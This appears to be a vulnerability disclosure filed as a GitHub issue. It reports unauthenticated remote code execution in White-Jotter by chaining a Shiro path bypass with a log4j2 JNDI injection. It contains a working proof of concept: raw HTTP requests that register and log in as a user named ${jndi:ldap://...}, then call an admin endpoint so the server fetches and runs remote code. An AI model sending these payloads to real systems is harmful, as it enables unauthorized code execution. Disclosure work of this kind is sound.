
There is an Unauthenticated Remote Command Execution in White-Jotter #162

@Fushuling

Description


[Suggested description]
White-Jotter contains an unauthenticated remote command execution vulnerability caused by improper access control in the Shiro configuration, combined with an unsafe version of log4j.

[Vulnerability Type]

Incorrect access control / Remote Code Execution (RCE)

[Vendor of Product]
https://github.com/Antabot/White-Jotter/

[Affected Product Code Base]
All versions (up to commit 9bcadcf)

[Attack Type]
Remote, unauthenticated

[Vulnerability details]
First, as described in https://github.com/DYX217/Incorrect-Access-Control, the pattern /api/aaa;/../ + sensitive interface can be used to bypass authentication. Here we use the interface /api/aaa;/../register to register, without authorization, a user named ${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}.

POST /api/aaa;/../register HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 128
Origin: http://localhost:8443
Sec-GPC: 1
Connection: close
Referer: http://localhost:8443/admin/user/profile
Priority: u=0

{"username":"${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}","password":"111","name":"111","phone":"111","email":"[email protected]"}

Then we log in with that username and obtain the session cookie:

POST /api/login HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 80
Origin: http://localhost:8443
Sec-GPC: 1
Connection: close
Referer: http://localhost:8443/login?redirect=%2Fadmin%2F
Priority: u=0

{"username":"${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}","password":"111"}

In onPreHandle, when a user accesses an interface that they do not have permission to access, log4j2 is used to record the event, which is exactly what the attacker can exploit.


The user we registered has very low permissions and cannot access the administrator-related interfaces. We only need to request an administrator interface, such as /api/admin/content/article, to make log4j2 process the username and achieve RCE:

GET /api/admin/content/article HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=B53F4730E1C34E707AA1FC5F7B388DBB
Upgrade-Insecure-Requests: 1
Priority: u=0, i

